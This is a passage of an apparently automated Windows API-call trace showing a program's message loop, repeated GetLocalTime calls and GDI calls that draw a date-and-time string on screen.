SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0140.263] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0140.263] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0140.263] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0140.263] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.689] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.689] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.689] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x1ae)) [0140.689] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x1ae)) [0140.690] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.712] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.712] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.712] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x1c5)) [0140.712] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x1c5)) [0140.712] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.720] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.720] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.720] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x1cd)) [0140.720] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x1cd)) [0140.720] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.849] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.849] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.849] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x24e)) [0140.849] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x24e)) [0140.849] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.857] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.857] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.857] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x256)) [0140.857] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x256)) [0140.857] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.877] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.877] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.877] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x26a)) [0140.877] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x26a)) [0140.877] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.887] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.887] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.887] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x274)) [0140.887] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x274)) [0140.887] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.910] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.910] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.910] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x28b)) [0140.910] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x28b)) [0140.910] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.920] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.920] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.920] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x295)) [0140.920] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x295)) [0140.920] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.965] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.965] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.965] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2c2)) [0140.965] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2c2)) [0140.965] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.985] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.985] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.985] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2d6)) [0140.985] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2d6)) [0140.985] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0140.995] TranslateMessage (lpMsg=0x2347a14) returned 0 [0140.995] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0140.995] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2e0)) [0140.995] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2e0)) [0140.995] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.019] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.019] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.019] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2f8)) [0141.019] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x2f8)) [0141.019] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.031] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.031] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.031] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x304)) [0141.031] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x304)) [0141.031] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.042] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.042] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.042] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x30f)) [0141.042] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x30f)) [0141.042] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.063] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.063] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.063] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x324)) [0141.063] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x324)) [0141.063] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.075] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.076] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.076] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x331)) [0141.076] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x331)) [0141.076] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.098] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.098] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.098] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x347)) [0141.098] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x347)) [0141.098] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.108] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.108] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.108] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x351)) [0141.108] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x351)) [0141.108] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.128] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.128] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.128] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x365)) [0141.128] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x365)) [0141.128] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.141] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.142] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.142] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x373)) [0141.142] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x373)) [0141.142] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.159] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.159] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.159] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x384)) [0141.159] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x384)) [0141.159] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.170] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.170] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.170] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x38f)) [0141.170] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x38f)) [0141.170] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.190] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.190] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.190] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3a3)) [0141.190] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3a3)) [0141.190] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.201] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.201] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.201] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3ae)) [0141.201] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3ae)) [0141.201] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.222] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.222] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.222] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3c3)) [0141.222] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3c3)) [0141.222] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.233] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.233] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.233] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3ce)) [0141.233] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3ce)) [0141.233] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.254] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.254] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.254] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3e3)) [0141.254] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xa, wMilliseconds=0x3e3)) [0141.254] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.264] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.264] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.264] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x5)) [0141.264] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x5)) [0141.264] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0141.264] GetDC (hWnd=0x0) returned 0xa0100d0 [0141.265] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0141.265] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0141.265] GetSysColor (nIndex=8) returned 0x0 [0141.265] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0141.265] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0141.265] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0141.265] UnrealizeObject (h=0x2d10099f) returned 1 [0141.265] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0141.265] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0141.265] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0141.265] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:11 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:11 PM", lprc=0x19f5bd) returned 13 [0141.266] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0141.266] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0141.266] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0141.266] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0141.266] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0141.266] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.285] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.285] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.285] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x1a)) [0141.285] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x1a)) [0141.285] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.296] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.296] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.296] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x25)) [0141.296] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x25)) [0141.296] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.349] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.349] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.349] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x5a)) [0141.349] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x5a)) [0141.349] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.360] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.361] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.361] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x66)) [0141.361] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x66)) [0141.361] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0141.371] TranslateMessage (lpMsg=0x2347a14) returned 0 [0141.371] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0141.371] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x70)) [0141.371] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x70)) [0141.371] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.046] 